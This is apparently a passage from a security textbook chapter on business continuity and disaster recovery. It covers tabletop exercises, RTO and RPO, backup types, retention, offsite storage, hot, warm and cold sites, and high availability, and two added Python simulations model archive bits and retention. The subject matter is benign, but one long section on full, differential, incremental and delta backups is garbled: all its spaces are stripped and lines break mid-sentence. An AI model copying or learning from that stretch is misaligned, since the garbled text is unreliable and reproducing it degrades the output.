Additionally, there are different formats for exercises with varying degrees of impact on the organization. The most basic is a checklist walkthrough in which individuals go through a recovery checklist to ensure that they understand what to do should the plan be invoked and confirm that all necessary equipment (hardware and software) is available. This type of exercise normally does not reveal "holes" in a plan but will show where discrepancies exist in the preparation for the plan. To examine the completeness of a plan, a different type of exercise needs to be conducted. The simplest is a tabletop exercise in which participants sit around a table with a facilitator who supplies information related to the "incident" and the processes that are being examined. Another type of exercise is a functional test in which certain aspects of a plan are tested to see how well they work (and how well prepared personnel are). At the most extreme are full operational exercises designed to actually interrupt services in order to verify that all aspects of a plan are in place and sufficient to respond to the type of incident that is being simulated.

Exercises are an often overlooked aspect of security. Many organizations do not believe that they have the time to spend on such events, but the question to ask is whether they can afford not to conduct these exercises, as they ensure the organization has a viable plan to recover from disasters and that operations can continue. Make sure you understand what is involved in these critical tests of your organization's plans.

Tabletop Exercises

Exercising operational plans is an effort that can take on many different forms. For senior decision makers, the point of action is more typically a desk or a conference room, with their method being meetings and decisions. A common form of exercising operational plans for senior management is the tabletop exercise. The senior management team, or elements of it, are gathered together and presented a scenario. They can walk through their decision-making steps, communicate with others, and go through the motions of the exercise in the pattern in which they would likely be involved. The scenario is presented at a level to test the responsiveness of their decisions and decision-making process. Because the event is frequently run in a conference room, around a table, the name tabletop exercise has come to define this form of exercise.
Recovery Time Objective and Recovery Point Objective

The term recovery time objective (RTO) is used to describe the target time that is set for a resumption of operations after an incident. This is a period of time that is defined by the business, based on the needs of the enterprise. A shorter RTO results in higher costs because it requires greater coordination and resources. This term is commonly used in business continuity and disaster recovery operations. Recovery point objective (RPO), a totally different concept from RTO, is the time period representing the maximum period of acceptable data loss. The RPO determines the frequency of backup operations necessary to prevent unacceptable levels of data loss: an RPO of one hour cannot be met by nightly backups, since a failure just before the next backup would lose up to a day of work. A simple way of establishing RPO is to answer the following questions: How much data can you afford to lose? How much rework is tolerable? RTO and RPO are seemingly related but in actuality measure different things entirely. The RTO serves the purpose of defining the requirements for business continuity, while the RPO deals with backup frequency. It is possible to have an RTO of 1 day and an RPO of 1 hour, or an RTO of 1 hour and an RPO of 1 day. The determining factors are the needs of the business.

Although recovery time objective and recovery point objective seem to be the same or similar, they are very different: the RTO bounds how long operations may be down, while the RPO bounds how much data may be lost.
Backups

A key element in any BC/DR plan is the availability of backups. This is true not only because of the possibility of a disaster, but also because hardware and storage media will periodically fail, resulting in loss or corruption of critical data. An organization might also find backups critical when security measures have failed and an individual has gained access to important information that may have become corrupted or at the very least can't be trusted. Data backup is thus a critical element in these plans, as well as in normal operation. There are several factors to consider in an organization's data backup strategy:

How frequently should backups be conducted?
How extensive do the backups need to be?
What is the process for conducting backups?
Who is responsible for ensuring backups are created?
Where will the backups be stored?
How long will backups be kept?
How many copies will be maintained?

Keep in mind that the purpose of a backup is to provide valid, uncorrupted data in the event of corruption or loss of the original file or the media where the data was stored. Depending on the type of organization, legal requirements for maintaining backups can also affect how it is accomplished.

Tech Tip

Backups Are a Key Responsibility for Administrators
One of the most important tools a security administrator has is a backup. While backups will not prevent a security event (or natural disaster) from occurring, they often can save an organization from a catastrophe by allowing it to quickly return to full operation after an event occurs. Conducting frequent backups and having a viable backup and recovery plan are two of the most important responsibilities of a security administrator. Two caveats apply: a backup that has never been restored is an untested backup, and a copy that is writable from the production network can be destroyed or encrypted by the same intruder who took down the originals, so at least one copy should be kept offline or otherwise write-protected.

What Needs to Be Backed Up

Backups commonly comprise the data that an organization relies on to conduct its daily operations. While this is certainly essential, a good backup plan will consider more than just the data; it will include any application programs needed to process the data and the operating system and utilities that the hardware platform requires to run the applications. Obviously, the application programs and operating system will change much less frequently than the data itself, so the frequency with which these items need to be backed up is considerably different. This should be reflected in the organization's backup plan and strategy. The BC/DR plan should also address other items related to backups. Personnel, equipment, and electrical power must also be part of the plan. Somebody needs to understand the operation of the critical hardware and software used by the organization. If the disaster that destroyed the original copy of the data and the original systems also results in the loss of the only personnel who know how to process the data, having backup data will not be enough to restore normal operations for the organization. Similarly, if the data requires specific software to be run on a very specific hardware platform, then having the data without the application program or required hardware will also not be sufficient.

Tech Tip

Implementing the Right Type of Backups
Carefully consider the type of backup that you want to conduct. With the size of today's PC hard drives, a complete backup of the entire hard drive can take a considerable amount of time. Implement the type of backup that you need and check for software tools that can help you in establishing a viable backup schedule.

Strategies for Backups

The process for creating a backup copy of data and software requires more thought than simply stating "copy all required files." The size of the resulting backup must be considered, as well as the time required to conduct the backup. Both of these will affect details such as how frequently the backup will occur and the type of storage medium that will be used for the backup. Other considerations include who will be responsible for conducting the backup, where the backups will be stored, and how long they should be maintained. Short-term storage for accidentally deleted files that users need to have restored should probably be close at hand. Longer-term storage for backups that may be several months or even years old should occur in a different facility. It should be evident by now that even something that sounds as simple as maintaining backup copies of essential data requires careful consideration and planning.
Types of Backups

The amount of data that will be backed up, and the time it takes to accomplish this, has a direct bearing on the type of backup that should be performed. Table 19.2 outlines the four basic types of backups that can be conducted, the amount of space required for each, and the ease of restoration using each strategy.

Table 19.2 Backup Types and Characteristics

The values for each of the strategies in Table 19.2 are highly variable depending on your specific environment. The more frequently files are changed between backups, the more these strategies will look alike. What each strategy entails bears further explanation.

Tech Tip

Archive Bits
The archive bit is used to indicate whether a file has (1) or has not (0) changed since it was last backed up. The bit is set (changed to a 1) if the file is modified; in some cases, if the file is copied, the new copy of the file has its archive bit set as well. The bit is reset (changed to a 0) when the file is captured by a full or incremental backup; a differential backup reads the bit to decide what to copy but leaves it set. The archive bit is therefore what lets methods such as the differential and incremental backup methods determine which files need to be backed up.
Theeasiesttypeofbackuptounderstandisthefullbackup.Inafullbackup,allfilesandsoftwarearecopiedontothestoragemedia.Restorationfromafullbackupissimilarlystraightforward—youmustcopyallthefilesbackontothesystem.Thisprocesscantakeaconsiderableamountoftime.ConsiderthesizeofeventheaveragehomePCtoday,forwhichstorageismeasuredintensandhundredsofgigabytes.Copyingthisamountofdatatakestime.Inafullbackup,thearchivebitiscleared.Inadifferentialbackup,onlythefilesandsoftwarethathavechanged
sincethelastfullbackupwascompletedarebackedup.Thisalsoimpliesthatperiodicallyafullbackupneedstobeaccomplished.Thefrequencyofthefullbackupversustheinterimdifferentialbackupsdependsonyourorganizationandneedstobepartofyourdefinedstrategy.Restorationfromadifferentialbackuprequirestwosteps:thelastfullbackupfirstneedstobeloaded,andthenthelastdifferentialbackupperformedcanbeappliedtoupdatethefilesthathavebeenchangedsincethefullbackupwasconducted.Again,thisisnotadifficultprocess,butitdoestakesometime.Theamountoftimetoaccomplishtheperiodicdifferentialbackup,however,ismuchlessthanthatforafullbackup,andthisisoneoftheadvantagesofthismethod.Obviously,ifalotoftimehaspassedbetweendifferentialbackups,orifmostfilesinyourenvironmentchangefrequently,thenthedifferentialbackupdoesnotdiffermuchfromafullbackup.Itshouldalsobeobviousthattoaccomplishthedifferentialbackup,thesystemhastohaveamethodtodeterminewhichfileshavebeenchangedsincesomegivenpointintime.Thearchivebitisnotclearedinadifferentialbackupsincethekeyforadifferentialistobackupallfilesthathavechangedsincethelastfullbackup.Withincrementalbackups,evenlessinformationwillbestoredineach
backup.Theincrementalbackupisavariationonadifferentialbackup,withthedifferencebeingthatinsteadofcopyingallfilesthathavechanged
sincethelastfullbackup,theincrementalbackupbacksuponlyfilesthathavechangedsincethelastfullorincrementalbackupoccurred,thusrequiringfewerfilestobebackedup.Justasinthecaseofthedifferentialbackup,theincrementalbackupreliesontheoccasionalfullbackupbeingaccomplished.Afterthat,youbackuponlyfilesthathavechangedsincethelastbackupofanysortwasconducted.Torestoreasystemusingthistypeofbackupmethodrequiresquiteabitmorework.Youfirstneedtogobacktothelastfullbackupandreloadthesystemwiththisdata.Thenyouhavetoupdatethesystemwitheveryincrementalbackupthathasoccurredsincethefullbackup.Theadvantageofthistypeofbackupisthatitrequireslessstorageandtimetoaccomplish.Thedisadvantageisthattherestorationprocessismoreinvolved.Assumingthatyoudon’tfrequentlyhavetoconductacompleterestorationofyoursystem,however,theincrementalbackupisavalidtechnique.Anincrementalbackupwillclearthearchivebit.Finally,thegoalofthedeltabackupistobackupaslittleinformation
aspossibleeachtimeyouperformabackup.Aswiththeotherstrategies,anoccasionalfullbackupmustbeaccomplished.Afterthat,whenadeltabackupisconductedatspecificintervals,onlytheportionsofthefilesthathavebeenchangedwillbestored.Theadvantageofthisiseasytoillustrate.Ifyourorganizationmaintainsalargedatabasewiththousandsofrecordscomprisingseveralhundredmegabytesofdata,theentiredatabasewouldbecopiedinthepreviousbackuptypesevenifonlyonerecordhaschanged.Foradeltabackup,onlytheactualrecordthatchangedwouldbestored.Thedisadvantageofthismethodisthatrestorationisacomplexprocess,becauseitrequiresmorethanjustloadingafile(orseveralfiles).Itrequiresthatapplicationsoftwareberuntoupdatetherecordsinthefilesthathavebeenchanged.Therearesomenewerbackupmethodsthataresimilartodeltabackups
inthattheyminimizewhatisbackedup.Therearereal-timeornear-real-timebackupstrategies,suchasjournaling,transactionalbackups,andelectronicvaulting,thatcanprovideprotectionagainstlossinreal-timeenvironments.Implementingthesemethodsintoanoverallbackupstrategy
canincreaseoptionsandflexibilityduringtimesofrecovery.
ExamTip:Youneedtomakesureyouunderstandthedifferenttypesofbackupsandtheiradvantagesanddisadvantagesfortheexam.
Eachtypeofbackuphasadvantagesanddisadvantages.Whichtypeisbestforyourorganizationdependsontheamountofdatayouroutinelyprocessandstore,howfrequentlythedatachanges,howoftenyouexpecttohavetorestorefromabackup,andanumberofotherfactors.Thetypeyouselectwillshapeyouroverallbackupstrategyandprocesses.
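The archive-bit behaviour and restore chains described above, as an added simulation that is not part of the book: full and incremental backups clear the bit, differential backups leave it set, and the third schedule shows why a differential taken after incrementals no longer covers everything since the last full. The file names, contents and four-day edit history are constructed for the example.

```python
"""Simulate the full, differential and incremental backups the chapter describes,
using the archive bit as the chapter defines it: set (1) when a file is modified,
cleared (0) by a full or incremental backup, left untouched by a differential.
The files, contents and four-day edit history are constructed for this example."""
from dataclasses import dataclass

# Constructed edit history: day -> list of (file name, new content) writes.
EDITS = {
    0: [("payroll.db", "p0"), ("config.ini", "c0"), ("notes.txt", "n0")],
    1: [("notes.txt", "n1")],
    2: [("payroll.db", "p2")],
    3: [("notes.txt", "n3"), ("config.ini", "c3")],
}


@dataclass
class Snapshot:
    kind: str     # "full", "differential" or "incremental"
    day: int
    files: dict   # name -> content copied by this backup


class Volume:
    """Live files plus one archive bit per file (1 = changed since the bit was last cleared)."""

    def __init__(self):
        self.content = {}
        self.archive = {}

    def write(self, name, data):
        self.content[name] = data
        self.archive[name] = 1            # any modification sets the bit

    def backup(self, kind, day):
        if kind == "full":
            picked = list(self.content)   # everything, regardless of the bit
        else:
            picked = [n for n, bit in self.archive.items() if bit]
        snap = Snapshot(kind, day, {n: self.content[n] for n in picked})
        if kind in ("full", "incremental"):
            for n in picked:
                self.archive[n] = 0       # a differential leaves the bit set
        return snap


def restore(snapshots):
    """Rebuild files the way the chapter describes restoration: load the latest full,
    then the latest differential if that is what follows it, otherwise replay every
    incremental since the full, in order. Returns (files, chain labels)."""
    last_full = max(i for i, s in enumerate(snapshots) if s.kind == "full")
    later = snapshots[last_full + 1:]
    chain = [snapshots[last_full]]
    if later and later[-1].kind == "differential":
        chain.append(later[-1])           # two steps: full + last differential
    else:
        chain.extend(later)               # every incremental must be applied
    files = {}
    for snap in chain:
        files.update(snap.files)
    return files, [f"{s.kind}@{s.day}" for s in chain]


def run(schedule):
    """Apply EDITS day by day, taking the backup type `schedule` names for each day.
    Returns (live files at the end, list of Snapshot)."""
    vol = Volume()
    snaps = []
    for day in sorted(EDITS):
        for name, data in EDITS[day]:
            vol.write(name, data)
        snaps.append(vol.backup(schedule[day], day))
    return dict(vol.content), snaps


if __name__ == "__main__":
    for label, kinds in (("differential", ["full"] + ["differential"] * 3),
                         ("incremental", ["full"] + ["incremental"] * 3),
                         ("mixed", ["full", "incremental", "incremental", "differential"])):
        live, snaps = run(dict(enumerate(kinds)))
        restored, chain = restore(snaps)
        print(label, [len(s.files) for s in snaps], chain,
              "restore matches live" if restored == live else "restore is STALE")
```

The per-backup file counts show the storage trade-off the chapter describes (the differential grows toward a full, the incremental stays small) while the chain length shows the restore cost.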
Backup Frequency and Retention
The type of backup strategy an organization employs is often affected by how frequently the organization conducts the backup activity. The usefulness of a backup is directly related to how many changes have occurred since the backup was created, and this is obviously affected by how often backups are created. The longer it has been since the backup was created, the more changes that likely will have occurred. There is no easy answer, however, to how frequently an organization should perform backups. Every organization should consider how long it can survive without current data from which to operate. It can then determine how long it will take to restore from backups, using various methods, and decide how frequently backups need to occur. This sounds simple, but it is a serious, complex decision to make.
Tech Tip
Determining How Long to Maintain Backups
Determining the length of time that you retain your backups should not be based on the frequency of your backups. The more often you conduct backup operations, the more data you will have. You might be tempted to trim the number of backups retained to keep storage costs down, but you need to evaluate how long you need to retain backups based on your operational environment and then keep the appropriate number of backups.
Related to the frequency question is the issue of how long backups should be maintained. Is it sufficient to simply maintain a single backup from which to restore data? Security professionals will tell you no; multiple backups should be maintained, for a variety of reasons. If the reason for restoring from the backup is the discovery of an intruder in the system, it is important to restore the system to its pre-intrusion state. If the intruder has been in the system for several months before being discovered, and backups are taken weekly, it will not be possible to restore to a pre-intrusion state if only one backup is maintained. This would mean that all data and system files would be suspect and may not be reliable. If multiple backups were maintained, at various intervals, then it is easier to return to a point before the intrusion (or before the security or operational event that is necessitating the restoration) occurred.
There are several strategies or approaches to backup retention. One common and easy-to-remember strategy is the "rule of three," in which the three most recent backups are kept. When a new backup is created, the oldest backup is overwritten. Another strategy is to keep the most recent copy of backups for various time intervals. For example, you might keep the latest daily, weekly, monthly, quarterly, and yearly backups. Note that in certain environments, regulatory issues may prescribe a specific frequency and retention period, so it is important to know your organization's requirements when determining how often you will create a backup and how long you will keep it.
If you are not in an environment for which regulatory issues dictate the frequency and retention for backups, your goal will be to optimize the frequency. In determining the optimal backup frequency, two major costs need to be considered: the cost of the backup strategy you choose and the cost of recovery if you do not implement this backup strategy (that is, if no backups were created). You must also factor into this equation the probability that the backup will be needed on any given day. The two figures to consider then are these:
Alternative 1: (probability the backup is needed) × (cost of restoring with no backup)
Alternative 2: (probability the backup isn't needed) × (cost of the backup strategy)
The first of these two figures, alternative 1, can be considered the probable loss you can expect if your organization has no backup. The second figure, alternative 2, can be considered the amount you are willing to spend to ensure that you can restore, should a problem occur (think of this as backup insurance—the cost of an insurance policy that may never be used but that you are willing to pay for, just in case). For example, if the probability of a backup being needed is 10 percent, and the cost of restoring with no backup is $100,000, then the first equation would yield a figure of $10,000. This can be compared with the alternative, which would be a 90 percent chance the backup is not needed multiplied by the cost of implementing your backup strategy (of taking and maintaining the backups), which is, say, $10,000 annually. The second equation yields a figure of $9000. In this example, the cost of maintaining the backup is less than the cost of not having backups, so the former would be the better choice. While conceptually this is an easy trade-off to understand, in reality it is often difficult to accurately determine the probability of a backup being needed. Fortunately, the figures for the potential loss if there is no backup are generally so much greater than the cost of maintaining a backup that a mistake in judging the probability will not matter—it just makes too much sense to maintain backups. This example also uses a straight comparison based solely on the cost of the process of restoring with and without a backup strategy. What needs to be included in the cost of both of these is the loss that occurs while the asset is not available as it is being restored—in essence, a measurement of the value of the asset itself.
To optimize your backup strategy, you need to determine the correct balance between these two figures. Obviously, you do not want to spend more in your backup strategy than you face losing should you not have a backup plan at all. When working with these two calculations, you have to remember that this is a cost-avoidance exercise. The organization is not going to increase revenues with its backup strategy. The goal is to minimize the potential loss due to some catastrophic event by creating a backup strategy that will address your organization's needs. When you're calculating the cost of the backup strategy, consider the following:
The cost of the backup media required for a single backup
The storage costs for the backup media based on the retention policy
The labor costs associated with performing a single backup
The frequency with which backups are created
All of these considerations can be used to arrive at an annual cost for implementing your chosen backup strategy, and this figure can then be used as previously described.
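The two retention strategies named above (the "rule of three" and keeping the latest daily, weekly, monthly, quarterly and yearly copies), run as an added example against a constructed year of daily backups and checked against the intruder scenario from the same section: does any retained backup predate the intrusion? This code is not from the book; the tier counts (7 daily, 4 weekly, 12 monthly, 4 quarterly, 3 yearly) and the intrusion date are this example's assumptions.

```python
"""Two retention strategies from the chapter, run against a constructed year of daily
backups: the "rule of three" and a tiered policy that keeps the newest backup per day,
week, month, quarter and year. The tier counts are this example's assumption; the
chapter names the tiers but not how many of each to keep."""
from datetime import date, timedelta

# Constructed data: one backup per day for all of 2016; an intrusion began on
# 2016-09-15 and was only discovered on the last day of the year.
BACKUPS = [date(2016, 1, 1) + timedelta(days=i) for i in range(366)]
INTRUSION_BEGAN = date(2016, 9, 15)


def rule_of_three(backups):
    """Keep the three most recent backups; each new one overwrites the oldest."""
    return sorted(backups)[-3:]


def tiered_retention(backups, daily=7, weekly=4, monthly=12, quarterly=4, yearly=3):
    """Keep the newest backup in each of the most recent `daily` days, `weekly` ISO weeks,
    `monthly` months, `quarterly` quarters and `yearly` years (union of all tiers)."""
    backups = sorted(backups)
    tiers = (
        (lambda d: d, daily),
        (lambda d: tuple(d.isocalendar()[:2]), weekly),
        (lambda d: (d.year, d.month), monthly),
        (lambda d: (d.year, (d.month - 1) // 3), quarterly),
        (lambda d: d.year, yearly),
    )
    keep = set()
    for key, count in tiers:
        newest = {}
        for b in backups:
            newest[key(b)] = b        # ascending order, so the last write is the newest
        for bucket in sorted(newest)[-count:]:
            keep.add(newest[bucket])
    return sorted(keep)


def newest_clean_backup(kept, intrusion_began):
    """The newest retained backup taken strictly before the intrusion began, or None if
    the retention window is too short to reach a pre-intrusion state."""
    clean = [b for b in kept if b < intrusion_began]
    return max(clean) if clean else None


def demo():
    """Run both policies over BACKUPS and report, as ISO strings, what each keeps and
    whether a pre-intrusion restore point survives."""
    three = rule_of_three(BACKUPS)
    tiered = tiered_retention(BACKUPS)
    fmt = lambda d: d.isoformat() if d else None
    return {
        "rule_of_three_kept": [d.isoformat() for d in three],
        "tiered_kept_count": len(tiered),
        "tiered_kept": [d.isoformat() for d in tiered],
        "clean_rule_of_three": fmt(newest_clean_backup(three, INTRUSION_BEGAN)),
        "clean_tiered": fmt(newest_clean_backup(tiered, INTRUSION_BEGAN)),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

With a three-and-a-half-month intrusion, the rule of three leaves no clean restore point, while the tiered policy still holds the 31 August monthly copy at the cost of 20 retained backups instead of 3.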
Tech Tip
Onsite Backup Storage
One of the most frequent errors committed with backups is to store all backups onsite. While this greatly simplifies the process, it means that all data is stored in the same facility. Should a natural disaster occur (such as a fire or hurricane), you could lose not only your primary data storage devices but your backups as well. You need to use an offsite location to store at least some of your backups.
Storage of Backups
An important element to factor into the cost of the backup strategy is the expense of storing the backups. A simple strategy might be to store all your backups together for quick and easy recovery actions. This is not, however, a good idea. Suppose the catastrophic event that necessitated the restoration of backed-up data was a fire that destroyed the computer system the data was processed on. In this case, any backups that were stored in the same facility might also be lost in the same fire.
The solution is to keep copies of backups in separate locations. The most recent copy can be stored locally, as it is the most likely to be needed, while other copies can be kept at other locations. Depending on the level of security your organization desires, the storage facility itself could be reinforced against possible threats in your area (such as tornados or floods). A more recent advance is online backup services. A number of third-party companies offer high-speed connections for storing data in a separate facility. Transmitting the backup data via network connections alleviates some other issues with physical movement of more traditional storage media, such as care during transportation (tapes do not fare well in direct sunlight, for example) or the time that it takes to transport the tapes.
Tech Tip
Long-Term Backup Storage
An easy factor to overlook when upgrading systems is whether long-term backups will still be usable. You need to ensure that the type of media utilized for your long-term storage is compatible with the hardware that you are upgrading to. Otherwise, you may find yourself in a situation in which you need to restore data, and you have the data, but you don't have any way to restore it.
Issues with Long-Term Storage of Backups
Depending on the media used for an organization's backups, degradation of the media is a distinct possibility and needs to be considered. Magnetic media degrades over time (measured in years). In addition, tapes can be used a limited number of times before the surface begins to flake off. Magnetic media should thus be rotated and tested to ensure that it is still usable.
Another consideration is advances in technology. The media you used to store your data two years ago may now be considered obsolete (5.25-inch floppy disks, for example). Software applications also evolve, and the media may be present but may not be compatible with current versions of the software. This may mean that you need to maintain backup copies of both hardware and software in order to recover from older backup media.
Another issue is security related. If the file you stored was encrypted for security purposes, does anybody in the company remember the password to decrypt the file to restore the data? More than one employee in the company should know the key to decrypt the files, and this information should be passed along to another person when a critical employee with that information leaves, is terminated, or dies.
Alternative Sites
An issue related to the location of backup storage is where the restoration services will be conducted. Determination of when or if an alternative site is needed should be included in recovery and continuity plans. If the organization has suffered physical damage to a facility, having offsite storage of data is only part of the solution. This data will need to be processed somewhere, which means that computing facilities similar to those used in normal operations are required. There are a number of ways to approach this problem, including hot sites, warm sites, cold sites, and mobile backup sites.
A hot site is a fully configured environment that is similar to the normal operating environment and that can be operational immediately or within a few hours, depending on its configuration and the needs of the organization. A warm site is partially configured, usually having the peripherals and software but perhaps not the more expensive main processing computer. It is designed to be operational within a few days. A cold site has the basic environmental controls necessary to operate but has few of the computing components necessary for processing. Getting a cold site operational may take weeks. A mobile backup site generally is a trailer with the required computers and electrical power that can be driven to a location within hours of a disaster and set up to commence processing immediately.
Exam Tip: Understanding the differences between hot, warm, and cold sites is fundamental to understanding different business continuity strategies. Make sure that you understand the simple differences between these sites, the primary of which is how soon the alternative site can begin processing your organization's work.
Shared alternate sites may also be considered. These sites can be designed to handle the needs of different organizations in the event of an emergency. The hope is that the disaster will affect only one organization at a time. The benefit of this method is that the cost of the site can be shared among organizations. Two similar organizations located close to each other should not share the same alternate site, as there is a greater chance that they would both need it at the same time.
Try This!
Research Alternative Processing Sites
There is an industry built upon providing alternative processing sites in case of a disaster of some sort. Using the Internet or other resources, determine what resources are available in your area for hot, warm, and cold sites. Do you live in an area in which a lot of these services are offered? Do other areas of the country have more alternative processing sites available? What makes where you live a better or worse place for alternative sites?
All of these options can come with a considerable price tag, which makes another option, mutual aid agreements, a possible alternative. With a mutual aid agreement, similar organizations agree to assume the processing for the other party in the event a disaster occurs. This is sometimes referred to as a reciprocal site. The obvious assumption here is that both organizations will not be hit by the same disaster and that both have similar processing environments. If these two assumptions are correct, then a mutual aid agreement should be considered. Such an arrangement may not be legally enforceable, even if it is in writing, and organizations must consider this when developing their disaster plans. In addition, if the organization that the mutual aid agreement is made with also is hit by the same disaster, then both organizations will be in trouble. Additional contingencies need to be planned for even if a mutual aid agreement is made with another organization. There are also the obvious security concerns that must be considered when having another organization assume your organization's processing.
Utilities
The interruption of power is a common issue during a disaster. Computers and networks obviously require power to operate, so emergency power must be available in the event of any disruption of operations. For short-term interruptions, such as what might occur as the result of an electrical storm, uninterruptible power supplies (UPSs) may suffice. These devices contain a battery that provides steady power for short periods of time—enough to keep a system running should power only be lost for a few minutes, enough time to allow administrators to gracefully halt the system or network. For continued operations that extend beyond a few minutes, another source of power will be required. Generally this is provided by a backup emergency generator.
While backup generators are frequently used to provide power during an emergency, they are not a simple, maintenance-free solution. Generators need to be tested on a regular basis, and they can easily become strained if they are required to power too much equipment. If your organization is going to rely on an emergency generator for backup power, you must ensure that the system has reserve capacity beyond the anticipated load for the unanticipated loads that will undoubtedly be placed on it. Generators also take time to start up, so power to your organization will most likely be lost, even if only briefly, until the generators kick in. This means that you should also use a UPS to allow for a smooth transition to backup power. Generators are also expensive and require fuel—when looking for a place to locate your generator, don't forget the need to deliver fuel to it or you may find yourself hauling cans of fuel up a number of stairs.
When determining the need for backup power, don't forget to factor in environmental conditions. Running computer systems in a room with no air conditioning in the middle of the summer can result in an extremely uncomfortable environment for all to work in. Mobile backup sites, generally using trailers, often rely on generators for their power but also factor in the requirement for environmental controls.
Power is not the only essential utility for operations. Depending on the type of disaster that has occurred, telephone and Internet communication may also be lost, and wireless services may not be available. Planning for redundant means of communication (such as using both landlines and wireless) can help with most outages, but for large disasters, your backup plans should include the option to continue operations from a completely different location while waiting for communications in your area to be restored. Telecommunication carriers have their own emergency equipment and are fairly efficient at restoring communications, but it may take a few days.
Secure Recovery
Several companies offer recovery services, including power, communications, and technical support that your organization may need if its operations are disrupted. These companies advertise secure recovery sites or offices from which your organization can again begin to operate in a secure environment. Secure recovery is also advertised by other organizations that provide services that can remotely (over the Internet, for example) provide restoration services for critical files and data. In both cases—the actual physical suites and the remote service—security is an important element. During a disaster, your data does not become any less important, and you will want to make sure that you maintain the security (in terms of confidentiality and integrity, for example) of your data. As in other aspects of security, the decision to employ these services should be made based on a calculation of the benefits weighed against the potential loss if alternative means are used.
Cloud Computing
One of the newer innovations coming to computing via the Internet is the concept of cloud computing. Instead of owning and operating a dedicated set of servers for common business functions such as database services, file storage, e-mail services, and so forth, an organization can contract with third parties to provide these services over the Internet from their server farms. This is commonly referred to as Infrastructure as a Service (IaaS). The concept is that operations and maintenance is an activity that has become a commodity, and the Internet provides a reliable mechanism to access this more economical form of operational computing.
Pushing computing into the cloud may make good business sense from a cost perspective, but doing so does not change the fact that your organization is still responsible for ensuring that all the appropriate security measures are properly in place. How are backups being performed? What plan is in place for disaster recovery? How frequently are systems patched? What is the service level agreement (SLA) associated with the systems? It is easy to ignore the details when outsourcing these critical yet costly elements, but when something bad occurs, you must have confidence that the appropriate level of protection has been applied. These are the serious questions and difficult issues to resolve when moving computing into the cloud—location may change, but responsibility and technical issues are still there and form the risk of the solution.
Tech Tip
The Sidekick Failure of 2009
In October 2009, many T-Mobile Sidekick users discovered that their contacts, calendars, to-do lists, and photos were lost when cloud-based servers lost their data. Not all users were affected by the server failure, but for those that were, the loss was complete. T-Mobile quickly pointed the finger at Microsoft, who had acquired in February 2008 the small startup company, Danger, which built the cloud-based system for T-Mobile. To end users, this transaction was completely transparent. In the end, a lot of users lost their data, and were offered a $100 credit by T-Mobile against their bill. Regardless of where the blame lands, the affected end user must still face a simple question: did they consider the importance of backup? If the information on their phone was critical, did they perform a local backup? Or did they assume that the cloud and large corporations they contracted with did it for them?
High Availability and Fault Tolerance
Some other terms that may be used in discussions of continuity of operations in the face of a disruption of some sort are high availability and fault tolerance. One of the objectives of security is the availability of data and processing power when an authorized user desires it. High availability refers to the ability to maintain availability of data and operational processing despite a disrupting event. Generally this requires redundant systems, in terms of both power and processing, so that should one system fail, the other can take over operations without any break in service. High availability is more than data redundancy; it requires that both data and services be available.
Fault tolerance basically has the same goal as high availability—the uninterrupted access to data and services—and is accomplished by the mirroring of data and systems. Should a "fault" occur, causing disruption in a device such as a disk controller, the mirrored system provides the requested data with no apparent interruption in service to the user. High availability clustering is another method used to provide redundancy in critical situations. These clusters consist of additional computers upon which a critical process can be started if the cluster detects that there has been a hardware or software problem on the main system.
Exam Tip: Fault tolerance and high availability are similar in their goals, yet they are separate in application. High availability refers to maintaining both data and services in an operational state even when a disrupting event occurs. Fault tolerance is a design objective to achieve high availability should a fault occur.
Certain systems, such as servers, are more critical to business operations and should, therefore, be the object of fault-tolerance measures. A common technique used in fault tolerance is load balancing. Another closely related technique is clustering. Both techniques are discussed in the following sections.
Exam Tip: Redundancy is an important factor in both security and reliability. Make sure you understand how a system can benefit from redundant components.
Obviously, providing redundant systems and equipment comes with a price, and the need to provide this level of continuous, uninterrupted operation needs to be carefully evaluated.
Tech Tip
Uptime Metrics
Because uptime is critical, it is common to measure uptime (or, conversely, downtime) and use this measure to demonstrate reliability. A common measure for this has become the measure of "9s," as in 99 percent uptime, 99.99 percent uptime, and so on. When someone refers to "five nines" as a measure, this generally means 99.999 percent uptime. Expressing this in other terms, five nines of uptime correlates to less than five and a half minutes of downtime per year. Six nines is 31 seconds of downtime per year. One important note is that uptime is not the same as availability, for systems can be up but not available for reasons of network outage, so be sure you understand what is being counted.
Clustering
Clustering links a group of systems to have them work together, functioning as a single system. In many respects, a cluster of computers working together can be considered a single larger computer, with the advantage of costing less than a single comparably powerful computer. A cluster also has the fault-tolerant advantage of not being reliant on any single computer system for overall system performance.
Load Balancing
Load balancing is designed to distribute the processing load over two or more systems. It is used to help improve resource utilization and throughput but also has the added advantage of increasing the fault tolerance of the overall system, because a critical process may be split across several systems. Should any one system fail, the others can pick up the processing it was handling. While there may be an impact to overall throughput, the operation does not go down entirely. Load balancing is often utilized for systems that handle websites and high-bandwidth file transfers.
Single Point of Failure
Related to the topic of high availability is the concept of a single point of failure. A single point of failure is a critical operation in the organization upon which many other operations rely and which itself relies on a single item that, if lost, would halt this critical operation. A single point of failure can be a special piece of hardware, a process, a specific piece of data, or even an essential utility. Single points of failure need to be identified if high availability is required because they are potentially the "weak links" in the chain that can cause disruption of the organization's operations. Generally, the solution to a single point of failure is to modify the critical operation so that it does not rely on this single element or to build redundant components into the critical operation to take over the process should one of these points fail.
Exam Tip: Understand the various ways that a single point of failure can be addressed, including the various types of redundancy and high availability clusters.
In addition to the internal resources you need to consider when evaluating your business functions, there are many external resources that can impact the operation of your business. You must look beyond hardware, software, and data to consider how the loss of various critical infrastructures can also impact business operations. The type of infrastructures you should consider in your BCP is the subject of the next section.
Failure and Recovery Timing
Several important concepts are involved in the issue of fault tolerance and system recovery. The first is mean time to failure (or mean time between failures). This term refers to the predicted average time that will elapse before failure (or between failures) of a system (generally referring to hardware components). Knowing what this time is for hardware components of various critical systems can help an organization plan for maintenance and equipment replacement.
Tech Tip
Load Balancing, Clusters, Farms
A cluster is a group of servers deployed to achieve a common objective. Clustered servers are aware of one another and have a mechanism to exchange their states, so each server's state is replicated to the other clustered servers. Load balancing is a mechanism where traffic is directed to identical servers based on availability. In load balancing, the servers are not aware of the state of other servers. For purposes of load, it is not uncommon to have a load balancer distribute requests to clustered servers. Database servers are typically clustered, as the integrity of the data structure requires all copies to be identical. Web servers and other content distribution mechanisms can use load balancing alone whenever maintaining state changes is not necessary across the environment. A server farm is a group of related servers in one location serving an enterprise. It can be either clustered, load balanced, or both.
